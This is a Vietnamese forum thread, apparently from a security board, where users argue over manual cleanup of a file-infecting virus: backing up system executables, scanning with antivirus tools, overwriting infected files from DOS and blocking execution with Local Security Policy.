kô thấy nhiễm nhưng bạn có thấy nó báo là có virus xâm nhập và nó đã chặn thành công kô? khi tôi dùng KVA canh phòng để vào những tra đó thì KAV thường xuyên báo có trojan và ngan chặn luôn khi tôi mở một link. bạn có thể mô tả tình trạng máy của bạn như thế nào dẫn đến bạn kết luân là chẳng thấy bị nhiễm kô?
nhân tiện bác nào có mẫu của cái con vir này thì gửi cho em thử với ,tính em tò mò lắm
karkar
email : karkar_hnc@yahoo.com
bài đầu tiên có link download đấy.
|
|
|
VXer wrote:
1. Về việc tôi nói tháo ổ cứng lắp sang máy khác:
Bạn hỏi tôi có hơn gì cách bạn dùng DOS hả? Ý tôi ở đây là dùng AV cài ở hệ điều hành (HĐH) khác quét cái hệ thống mình bị nhiễm (lúc đó ko ngại vấn đề khó diệt file hệ thống nữa). Cách này cũng tương tự như việc born2die bảo dùng windows khác trên cùng 1 hdd quét thôi, tuy nhiên trong trường hợp này có thể cả windows đó cũng đã bị nhiễm! Thế đã đủ rõ chưa?
rõ thì rõ rồi nhưng tôi thấy nó cũng kô hay hơn. Nếu sô lượng file bị nhiễm ít thì tháo ra kô bõ công, ra Dos làm vẫn nhanh hơn. chỉ cần ra Dos thay một vài file kô thay được trong win (làm một cái file .bat rồi ra Dos kích hoạt là xong) rồi vào win bật AV quét toàn bộ hệ thống.
2. Về việc restore file:
Cách mà tôi nêu ra (copy thành file với phần mở rộng khác, .exe -> .exx) là tôi nêu ra một cách khác để backup đống file hệ thống (khác so với cách bạn nói là nén lại ... gì gì đó). Tôi có giải thích tại sao lại làm như vậy rồi, là để tôi có thể đối chiếu 2 file (file .exe và file .exx tương ứng), để chẳng may có bị lây file thì cũng phát hiện ra được dựa vào filesize (đương nhiên là không phải lúc nào cũng phát hiện ra, nhưng đúng trong ko ít trường hợp).
tôi kô hỏi bạn ý nghĩa của việc copy file với phần mở rộng khác. mà tôi hỏi các bước làm việc đó như thế nào? có phải bạn sẽ vào từng folder trong %windir% rồi thấy file .exe nào thì bạn copy rồi paste ra luôn tại folder đó rồi đặt tên nó giống file cũ chỉ khác cái duôi .exe thành .exx ko? nếu đúng thì bạn có biết thời gian làm xong việc đó là bao lâu kô?
Và có thể còn nhiều cách khác nữa ...
Tóm lại là luôn phải chủ động sao lưu dữ liệu, nhất là những thông tin quan trọng.
Nói thế đã rõ chưa hả bạn GS??
Hình như cậu đã hiểu sai ý tôi. tôi chỉ cần cậu trình bày 1 cách đơn giản tốn ít thời gian nhất thôi.
Nhắc lại vấn đề: hệ thống bị nhiễm virus ăn file, nhiều file hệ thống đã bị ăn. nếu cài lại win thì sẽ phải mất rất nhiều thời gian cài lại theo rất nhiều ứng dụng trong đó nhiều ứng dụng bạn kô còn bộ setup hoặc cài khá phức tạp. Vấn đề bay giờ là đưa ra phương án chẩn bị từ trước (sao lưu)để đến lúc này thì tiến hành loại bỏm, thay thế những file bị nhiễm một cách nhanh nhất. chỉ đưa ra một phương án tốt nhất của bạn. Nhanh và đơn giản cả ở bước sao lưu lẫn bước khôi phục.
Bạn đã hiểu điều tôi muốn rồi chứ. mục đích của chúng ta làm tìm ra cách dơn giản nhất, nhanh nhất, có thể đưa ra ra 2 phương án 1 là đơn giản nhất và 2 là tốn ít thời gian nhất hoặc 2 in 1 bạn có chỉ ra được kô?
|
|
|
VXer wrote:
Thưa với bạn GS đúng là tôi bảo tháo ổ cứng để mà vào không vào DOS đấy, vì tôi không thể chạy BKAV, KAV trong DOS bạn ạ, tôi cũng không muốn và không thể viết removal tool cho DOS bạn ạ!
Thực sự kô hiểu bạn muốn nói gì ở cái đoạn này nếu có thể mong bạn nói rõ hơn. Để tôi nói rõ mục đích vào Dos của tôi chỉ là để dùng lệnh del và copy để thay thế một số file luôn luôn phải chạy cùng hệ thống nên kô thể thay(hoặc tôi chưa biết thay) khi win đang chạy chứ tôi chưa bao giờ nói sẽ chạy KAV hay AV nào ngoài dos nên tôi kô hiểu là tháo ổ sang máy khác thì sẽ hơn ở điểm gì?
Còn tính chuyện không có chỗ lắp ổ nhờ hả? Tính luôn chuyện không có máy tính mà đọc mấy bài post ở đây luôn nhá .
những điều tôi nói chỉ là hướng giải quyết. chỉ cần đọc và hiểu một lần đến khi gặp virus (bât kỳ con nào) có kiểu phá tương tự thì cứ thế mà làm chứ việc gì phải nối mạng để đọc lại mấy bài post ở đây.
Còn cách restore thì nhiều lắm, làm như bạn cũng tốt mà
Đấy, bật thì cứ tanh tách nhưng đến lúc bảo nói cụ thể ra cách của mình thì lại ko nói được. Có nhiều cách thì bạn cứ nói thử ra một cách đơn giản hơn cách của tôi xem thế nào? ok?
Tôi có cảm giác cậu luẩn quẩn rồi đấy. Nếu nói được tiếp thì xin bạn nói rõ một tí. những reply tối nghĩa như vậy dễ làm loãng topic lắm.
|
|
|
Hề ở đây ngoài chuyên chia sẻ thông tin thực tế về con này thì anh em cũng tiện thể trình bày quan điểm để hiểu nhau luôn lần sau gặp nhau trong này thì nói chuyện cho dễ ấy mừ lần đầu tiên nó hay thế các pác thông cảm nhé
- Hai là : Nếu đã nhiễm lây file thì cách hay nhất là nên tìm 1 AV đã xử lí con này thôi, chứ kill by hen suyễn thì khó rồi, gặp chú nào khủng nó ăn hết các file PE trong máy thì bai hand kiểu gì đây.
diệt tay kô phải là biện pháp tốt nhất trong mọi hoàn cảnh. chúng ta chỉ nên tham khảo rồi kết hợp với các AV để đưa ra phương án tốt nhất đối với một con virus trong một hoàn cảnh nào đó thôi.
hề hề topic này bội thu phết nhỉ hơn 2k lượt xem rồi đấy ko còn gì mới thì kết thúc thôi đỡ tốn tài nguyên sơ vơ iem chạy sang box tán gẫu làm mẻ mới
|
|
|
born2die wrote:
"Có thể anh kô gà về kiến thức nhưng nếu anh gà về tư duy thì anh sẽ luôn làm mọi việc trở nên phức tạp. kiểu như để giết một con kiến anh lại đi cho nó vào phong thì nghiệm nghiên cứu chán chê để chế ra một loại thuốc độc rành riêng cho nó (để thể hiện mình là pro ) thay vì một cái bóp tay vậy "
Ôi ôi, lây file mà GS gọi là "kiến", quả là siêu cao...gà ), há há há há, chết mất, bó cờ him.
Nói cho gà GS biết chứ mấy bài đầu có người miêu tả khá chi tiết rồi, iem gà của bác theo hướng đó đã viết được tool remove rồi, chẳng qua khiêm tốn tí cho bác tự sướng thôi, há há há. Cần em gửi tool không, xin một tiếng
Tôi thì kô cần, tôi khoái quai tay như tôi vẫn làm hơn tool như vậy chỉ áp dụng được với một con và nó làm tôi lười tư duy --> gà vẫn là gà kô khá hơn được còn cậu dựa vào những thông tin mà người khác cung cấp và kiến thức lập trình của mình để viết ra một tool thì cũng thường thôi, chẳng thể kết luận cậu là pro về virus.
Khiêm tốn kiểu của cậu tôi gọi là kiểu khiêm tốn khoe hàng chẳng chia sẻ được cho ai cái gì mà người ta vẫn nghĩ là mình có hàng
|
|
|
neo85 wrote:
Chả hiểu các bác phổ biến kiến thức cho gà kiểu gì, cãi nhau ỏm tỏi em loạn cả lên Gà tụi em chỉ quan tâm hết virus chớ có biết diệt rồi xóa, diệt mà không xóa ... gì gì đâu. Tóm lại giờ em chỉ biết ghost lại ổ rồi liều mình xài thử AV thôi hu hu hu
gà siêu cấp thế thì mình bó tay để hiểu và áp dụng những cách trogn này thì bạn cần phải có sắn một tẹo kiến thức cơ bản như process là gì? task manager dùng để làm gì? folder option dùng để làm gì? ... nếu bạn có hứng thú thì chỉ cần search google một tẹo là biết hêt. Còn nếu bạn kô có hứng thú "quai tay" như tiêu đề đầu tiên minh đặt cho topic này thì bạn cứ liều vậy thôi
cách diệt tay rất hữu dụng khi máy của bạn đã cài quá nhiều ứng dụng (có những ứng dụng bạn ko còn bàn setup nếu kiếm lại thì lại phải đi mượn hay mua rất phiền phức) và việc cài lại từ đầu tốn nhiều thời gian ... còn nếu máy bạn kô cài quá nhiều ứng dụng thì ghost là biện pháp hợp lý hơn. kô có tí kiến thức cơ bản nào về mấy cái này thì cài lại win cũng hơn
|
|
|
VXer wrote:
Thế bạn nghĩ tôi copy bằng tay mấy file .exe hả?? Thế thì phải xem lại ai tư duy gà nhá!!
Tôi nói dùng live cd để đổi đuôi .exe thành .exx hả? Tôi nói dùng live cd để đổi .exx thành .exe trong trường hợp bị nhiễm rồi bạn ạ! Còn chuyện dùng live cd hay không cũng chả bắt buộc, có thể vào dos như bạn làm cũng đc. Tôi chỉ muốn nói tới cách restore lại file hệ thống khi bị nhiễm thôi, bạn đọc kĩ lại coi!
Vậy bạn có thể nói rõ từng bước restore trên của bạn cho tôi và mọi người tham khảo kô? tui muốn mục đích của topic này là chia sẻ những cách diệt và khắc phục khi máy nhiễm virus chứ kô phải topic nói qua loa để khoe hàng phải bày hẳn ra thì mọi người mới biết chất lượng thế nào chứ cứ up úp mở mở thế thì chán lém
bạn chú ý là chưa bao giờ tôi nói mình kô phải là gà nhé. tôi là một con gà hơi bị bự và tôi rất khoáii bắt nạt mấy con gà con và kả mấy ông pro rởm nữa
Bạn nói cách của bạn ai cũng làm đc kể cả gà?? Thế tháo ổ cứng sang máy khác thì có gì là không được? Có khi còn đơn giản hơn cách của bạn đó!
Tháo ổ cứng sang máy khác làm gì vậy bạn? để kô phải vào dos hả? bạn chú ý là chỉ có một vài file kô thể thay trong khi win đang chạy thôi nên vào dos làm nhanh hơn táo ổ cứng rất nhiều. mà đâu phải nhà ai cũng có hai máy, nhỡ trong bán kính 5 km quanh cái máy của anh ta kô có cái máy nào khác thì sao
Nói chuyện mang con kiến vào phòng thí nghiệm hả? Thế bạn bóp tay con kiến thế nào vậy ta? Nào là vô hiệu hóa phần hoạt động của virus, nào là copy đè lên trong dos, nào là Local Security Policy ... Bóp tay nó là cài AV vào mà diệt cho xong!
đó chỉ là cách so sánh tương đối thôi bạn thân mến ạ! ý tôi là nếu coi việc khắc phục như của tôi đơn giản như giểt một con kiến bằng một cái bóp tay thì thì cách phân tích rồi tạo tool nó ngang với mang con kiến vào phòng thí nghiệm vậy sự cách biệt này áp dụng với những người gà kiến thức như tôi còn biết đâu đối với các pro thì nó đơn giản hơn với bop tay kô biết chừng
Bạn chú ý vài cái nữa là:
1. là tôi nói là cách của tôi có hiệu quả chứ tôi kô nói cách của tôi là đơn giản nhất nhé.
2. Gà cũng có nhiều loại gà, anh có thể là đỉnh cao pro ở mảng này nhưng sang mảng khác anh chỉ là gà con, đó là chuyện bình thường và cách gọi bình thường của tôi về một người kém hiểu biét về một lĩnh vực nào đó.
3. Gà kô đáng bị cười chỉ có gà kô biết mình là gà mới đáng bị cười chê
4. trong đây tôi đề cập tới 2 loại gà là gà về kiến thức virus và gà về tư duy
|
|
|
dangminh4 wrote:
Mấy con virus này thì diệt có gì khó đâu , hiện nay cái khó mình muốn hỏi ở đây là hiện tượng mở một số ứng dụng rất là lâu , đặc biệt là mở trình duyệt IE bác nào biết về cái này thì nói cho tui vói nhé , cám ơn
Nếu bạn thấy diệt nó quá đơn giản và cách diệt của bạn đơn giản hiệu quả hơn những cách ở trên thì bạn có thể chia sẽ cho mọi người cùng biết kô?
Nếu việc mở một số ứng dụng và IE rất là lâu nhưng kô liên quan tới con virus này thì mời bạn sang những box liên quan tới chuyện đó(thắc mắc thông thường căn bản, thảo luận HDH windows,...) để nhờ giải quyết nhé.
thân cái cho nó thân
|
|
|
VXer wrote:
Ghost Ship wrote:
Nhiều nhưng kô phải tất cả. kô biết cái nhiều của bạn là bao nhiêu % nhỉ? mình thì thấy mấy AV mình dùng toàn del thôi KAV và AVG là 2 cái mình đã dùng còn những cái khác chưa thử nghe nói đa số toàn del luôn.
BKAV ! Cái mà bác bảo không đáng thử đó . Nói thật là cũng hơi bị bất ngờ
KAV (Kaspersky Anti-virus) chứ kô phải BKAV nhé.
VXer wrote:
Ghost Ship wrote:
1. Khi máy mới cài win xong mình copy toàn bộ file .exe trong thư mục c:\windows ra một ổ khác nén lại cẩn thận. kô nhiều đâu chỉ khoảng 50MB thôi. nén xong còn cỡ gần 30MB
má ơi thế này gọi là diệt virus lây file đó sao Cũng dám gọi người khác là gà cơ đấy
Làm như ông thì có cách đơn giản hơn dó, copy ra chỗ khác mà làm gì, copy toàn bộ exe trong hệ thống rồi đổi phần mở rộng, exx chẳng hạn. Khi nào thấy 2 file khác size (file .exe và .exx sao chép ra trước đó) thì nghi ngờ là virus, hiện tượng này lặp lại trên nhiều file thì có thể kết luận thành virus đc roài. Boot từ CD rồi copy hết file .exx thành .exe như ban đầu, xong reboot.
trong %windir% có bao nhiêu file exe mà cậu lại tính chuyện copy ròi đổi phần mở rộng của chúng? làm bằng tay á tại sao sao lại phải boot từ CD khi mà có thể làm trong win dễ dàng?
VXer wrote:
Hic cứ tưởng ông debug rồi ngồi viết tool diệt, zậy mà còn đi chê av khác, rùi còn kêu người khác là gà, xong lại post cách zải quyết rất hoành tá tràng, đúng là chăn gà
debug rồi viết tool đâu phải ai cũng làm được? tui nói để ai cũng có thể làm dễ dàng chứ kô phải để khoe hàng nên tôi kô thích tìm hiểu những cách phức tạp. Cách của tôi ai cũng làm được kể cả gà.
Có thể anh kô gà về kiến thức nhưng nếu anh gà về tư duy thì anh sẽ luôn làm mọi việc trở nên phức tạp. kiểu như để giết một con kiến anh lại đi cho nó vào phong thì nghiệm nghiên cứu chán chê để chế ra một loại thuốc độc rành riêng cho nó (để thể hiện mình là pro ) thay vì một cái bóp tay vậy
|
|
|
VXer wrote:
Bạn ơi sao các AV diệt virus lây file là "del hết"?? Tui nhớ nhiều thằng nó disinfect lắm mờ!
Nhiều nhưng kô phải tất cả. kô biết cái nhiều của bạn là bao nhiêu % nhỉ? mình thì thấy mấy AV mình dùng toàn del thôi KAV và AVG là 2 cái mình đã dùng còn những cái khác chưa thử nghe nói đa số toàn del luôn.
VXer wrote:
Ghost Ship wrote:
Nói cho cậu biêt dù nó có ăn file hệ thống thì cách diệt của tôi vẫn thịt được nó mà kô cần làm lại win
Ghê ah nha! Bác dùng ollydbg, hexworkshop ... mở từng file ra rồi disinfect hả? Cho gà này học hỏi với!! Gà này chỉ biết trong trường hợp lây file thì tốt nhất là tìm thằng AV nào xịn xịn mang về test thử, tốt nhất là ghost lại ổ trước khi quét ah! Còn thích tự túc thì vác mẫu sang máy khác mà debug rồi làm tool. Mai mốt khăn gói sang nhà bác GS nhờ bác dạy disinfect bằng tay nhá
hề mình gọi người khác là gà kô có nghĩa là mình gọi mình là cao thủ đâu giống như có người đá bóng kô hay nhưng nhìn thi đấu thì biết ai đá dở ai đá hay vậy đó
Cách diệt của mình rất đơn giản (nếu kô muốn nói là nông dân ) nhưng mình nghĩ là hiệu quả và mình đã làm khá nhiều lần thành công.
1. Khi máy mới cài win xong mình copy toàn bộ file .exe trong thư mục c:\windows ra một ổ khác nén lại cẩn thận. kô nhiều đâu chỉ khoảng 50MB thôi. nén xong còn cỡ gần 30MB
2. Khi máy bị nhiễm thì vô hiệu phần hoạt động của virus trước.
3. Sau khi vô hiệu được phần hoạt động của virus thì mình sẽ dùng một AV đã update con đó để quét thư mục hệ thống (c:\windows) mình thường dùng KAV. Thấy nó báo file nào bị nhiễm thì vào cái chỗ mình đã sao lưu copy ra đè lên file bị nhiễm đó chứ chả cần phải phân tích rồi tách tiếc chi cho mệt Nếu một số fiel kô đè được trong win(kô nhiều) thì tạm bỏ qua ghi nó lại rồi ra dos để đè.
Quan trọng vẫn là phát hiện sớm điều trị kịp thời. Nếu con nào nó mới quá chưa có Av nào update thì có thể dùng Local Security Policy để ngăn kô cho nó được kích hoạt --> dù có click vào file bị nhiễm thì con virus cũng kô thể chạy được --> kô thể lây thêm được đợi lúc nào có AV phát hiện ra thì tiến hành thay file.
nếu mới bị nhiễm mà diệt ngay thì thay còn đỡ chứ nếu để nó nhiễm cỡ vài hôm hay vài tuần rồi thì cài lại win cho nhanh chứ thay hết file thì có mà ngất
Đơn giản vậy thôi
P/S: Hic em lại ấn nhầm chỉnh thành trích roài pác mod nào del hộ em bài trên nhé. Khuya rồi em hơi hoa mắt
|
|
|
|
|
|
|